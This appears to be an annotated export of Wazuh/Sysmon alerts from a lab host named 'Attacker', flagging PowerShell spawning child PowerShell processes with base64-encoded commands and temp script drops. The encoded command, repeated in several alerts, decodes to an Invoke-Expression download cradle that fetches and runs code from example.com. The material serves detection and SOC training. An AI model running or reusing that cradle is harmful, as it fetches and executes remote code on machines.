data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:48.495 ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ProcessId: 10384 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} ParentProcessId: 11904 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:48.495
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd39-680a-550b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11904
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:52.769+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:52.769+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534272.1496244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:50.4145156Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284108
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:50.403 ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ProcessId: 10384 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_40uxjzck.fes.ps1 CreationUtcTime: 2025-04-24 22:37:50.403 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:50.403
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_40uxjzck.fes.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:50.403
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:55.932+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:55.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  60
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534275.1499013
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:53.3104930Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284125
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:51.737 ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ProcessId: 9020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} ParentProcessId: 10384 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:51.737
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd3c-680a-570b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:55.932+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:55.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534275.1507080
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:53.5659094Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284126
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:53.554 ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ProcessId: 9020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aeouh1r0.rm1.ps1 CreationUtcTime: 2025-04-24 22:37:53.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:53.554
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_aeouh1r0.rm1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:53.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:57.346+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:57.346+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  61
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534277.1509845
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:54.9897371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284143
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

